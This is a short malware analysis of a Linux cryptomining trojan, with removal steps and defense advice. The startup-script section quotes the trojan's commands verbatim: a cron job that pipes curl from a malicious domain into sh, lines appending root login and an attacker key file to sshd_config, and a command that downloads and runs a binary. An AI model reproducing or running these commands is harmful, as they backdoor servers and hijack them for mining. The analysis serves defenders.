How Mining Trojans Hijack Linux Servers: Sample 101 Analysis and Defense

Sample 101 Malware Overview

The continuation of the analysis of sample 101 reveals that threat actors embed trojans to commandeer large numbers of hosts, using them for on‑demand DDoS attacks or cryptocurrency mining. The process list shows

/opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8080 -u 48vKMSzWMF8TCVvMJ6jV1BfKZJFwNXRntazXquc7fvq9DW23GKk cvQMinrKeQ1vuxD4RTmiYmCwY4inWmvCXWbcJHL3JDwp -p x

, indicating a cryptonight miner connecting to a remote pool.

Malicious Startup Script

The trojan installs a cron job that repeatedly downloads and executes a script from a malicious domain:

*/15 * * * * curl -fsSL https://r.chanstring.com/pm.sh?0706 | sh

It also creates a hidden SSH private key file /root/.ssh/KHK75NEOiq and injects the attacker’s public key, then modifies /etc/ssh/sshd_config to enable root login and public‑key authentication:

echo "PermitRootLogin yes" >> /etc/ssh/sshd_config

echo "RSAAuthentication yes" >> /etc/ssh/sshd_config

echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config

echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config

After updating the configuration, the script restarts the SSH daemon ( /etc/init.d/sshd restart).

Next, the script checks for the presence of a service named lady. If missing, it downloads a binary from https://r.chanstring.com/v12/lady_`uname -i`, makes it executable, and runs it:

mkdir -p /opt && curl -fsSL https://r.chanstring.com/v12/lady_`uname -i` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33

The service is then started via multiple methods ( service lady start, systemctl start lady.service, /etc/init.d/lady start).

Removal Instructions

The article provides a set of commands to stop and clean the infection:

# systemctl stop lady.service
# pkill /opt/cron
# pkill /usr/bin/cron
# rm -rf /etc/init.d/lady
# rm -rf /etc/systemd/system/lady.service
# rm -rf /opt/KHK75NEOiq33
# rm -rf /usr/bin/cron
# rm -rf /usr/bin/.cron.old
# rm -rf /usr/bin/.cron.new

Business Model Impact

Infected machines experience severe performance degradation, high CPU load, and constant fan activity. The mining trojan consumes large amounts of electricity, accelerating wear on CPUs and GPUs. Because Bitcoin transactions are anonymous and irreversible, stolen cryptocurrency is difficult to trace, making it an attractive target for attackers.

Attack Vectors and Defense Strategies

Typical infection paths include exploiting weak security policies and vulnerabilities in services such as Jenkins or Redis to gain root privileges. Effective defense focuses on hardening configurations, applying patches promptly, and closely monitoring server resource usage (CPU/load). The malware mutates frequently, so signature‑based antivirus solutions may fail; the article includes a sample hash (

63210b24f42c05b2c5f8fd62e98dba6de45c7d751a2e55700d22983772886017

) for reference.